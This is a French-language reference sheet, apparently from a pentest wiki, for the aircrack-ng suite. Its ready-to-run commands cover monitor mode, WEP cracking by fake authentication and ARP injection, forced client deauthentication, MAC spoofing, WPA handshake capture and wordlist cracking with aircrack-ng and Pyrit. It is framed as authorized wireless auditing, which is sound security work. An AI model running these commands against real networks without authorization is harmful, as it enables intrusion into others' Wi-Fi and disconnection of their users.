Aircrack
| Fiche express | |
|---|---|
| Domaine | Audit Wi-Fi, cassage WEP / WPA-PSK |
| Suite | aircrack-ng (airmon-ng, airodump-ng, aireplay-ng, aircrack-ng)
|
| Contexte | Test d'intrusion sans-fil sur un reseau autorise |
| Voir aussi | Wifite · Reaver · Cowpatty · Wpa supplicant |
La suite aircrack-ng regroupe les outils de reference pour l'audit des reseaux Wi-Fi : capture du trafic, injection de paquets et cassage des cles WEP et WPA/WPA2-PSK. L'interface graphique Wifite s'appuie sur cette suite.
Preparation de l'interface
Passer la carte en mode moniteur :
iwconfig wlan0 down
iwconfig wlan0 mode monitor
iwconfig wlan0 up
apt-get install aircrack-ng
Lister les interfaces Wi-Fi du poste :
iwconfig
Ordre de grandeur du nombre de paquets (IV) a collecter pour casser une cle WEP :
- environ 400 000 paquets pour une cle WEP 64 bits ;
- environ 1 200 000 paquets pour une cle WEP 128 bits.
La compatibilite des cartes en mode moniteur est documentee sur aircrack-ng.org.
Procedure WEP
Activer le mode moniteur :
airmon-ng start wlan0 [channel]
Lister les reseaux visibles :
airodump-ng mon0
Capturer les paquets d'un canal donne :
airodump-ng -c [channel] --bssid [mac_ap] -w [fichier] mon0
Creer une fausse authentification :
# WEP
aireplay-ng -1 0 -a [mac_ap] mon0
# WPA2 (mac_local visible dans ifconfig)
aireplay-ng -0 0 -a [mac_ap] -c [mac_local] mon0
Injecter des paquets (ici mode 3, reinjection ARP) :
# WEP
aireplay-ng -3 -b [mac_ap] mon0
# WPA2
aireplay-ng -0 0 -a [mac_ap] mon0
Casser le fichier de capture :
aircrack-ng [fichier.cap]
aircrack-ng [fichier.cap] -w /usr/share/wordlists/darkc0de.lst
Une fois la cle retrouvee, etablir la connexion (par exemple via Wicd).
Modes de aireplay-ng
man aireplay-ng
- -0 : desauthentification, deconnecte les clients
- -1 : fausse authentification
- -2 : reinjection de paquet (mode interactif)
- -3 : injection de requete ARP
- -4 : attaque chopchop
- -5 : attaque par fragmentation
- -6 : Caffe Latte
- -7 : cfrag par fragmentation
- -8 : migmode (contre Aironet Cisco)
- -9 : test de la qualite d'injection
- -Z : attaque PTW
Exemple de mode interactif (-2) :
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b AA:BB:CC:DD:EE:FF mon0
Fausse authentification puis reinjection ARP (-3) :
aireplay-ng -1 0 -e [essid] -a [mac_ap] -h 00:00:00:00:00:01 wlan0
aireplay-ng -3 -e [essid] -b [mac_ap] -h 00:00:00:00:00:01 wlan0
aireplay-ng -3 -b [mac_ap] wlan0
Attaque Caffe Latte (-6) :
aireplay-ng --caffe-latte -b [mac_ap] mon0
L'attaque PTW reduit fortement le nombre de paquets necessaires pour retrouver la cle.
Se connecter au reseau
# authentification WEP
iwconfig wlan0 essid "mon_essid" channel 6 key password
dhclient wlan0
netdiscover
Pour une authentification WPA, voir Wpa supplicant.
Cassage WPA
Le cassage WPA est plus complexe : il repose sur la capture d'un handshake puis une attaque par dictionnaire.
airodump-ng -w capture --bssid [mac_ap] -c [channel] mon0
aireplay-ng --deauth 1 -a [mac_ap] -c [mac_station] mon0
Procedure complete :
airmon-ng start wlan0 [channel]
airmon-ng
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up
airodump-ng mon0
airodump-ng -c 1 -w [fichier] --bssid [bssid] --ivs mon0
Attendre l'apparition d'une station (client authentifie), puis forcer une desauthentification :
aireplay-ng -0 1 -e [essid] mon0
Le handshake WPA doit apparaitre dans l'en-tete de airodump-ng. Casser ensuite par dictionnaire :
aircrack-ng -w /usr/share/wordlists/darkc0de.lst fichier-01.ivs
Pyrit
Pyrit accelere le cassage WPA-PSK et peut etre utilise en cluster :
svn checkout http://pyrit.googlecode.com/svn/trunk pyrit
sudo apt-get install libssl-dev python python-dev
sudo python setup.py install
Importer les cles candidates et les ESSID, puis lancer le calcul :
pyrit -i dict.gz import_passwords
pyrit -e linksys create_essid
pyrit batch
Capturer puis attaquer :
airodump-ng --write wpapskcapture.cap wlan0
pyrit -r wpapskcapture.cap attack_db
Voir aussi
- Wifite — automatisation de la suite aircrack-ng
- Reaver — attaque WPS
- Cowpatty — cassage WPA par dictionnaire / rainbow tables
- Wpa supplicant — connexion WPA en ligne de commande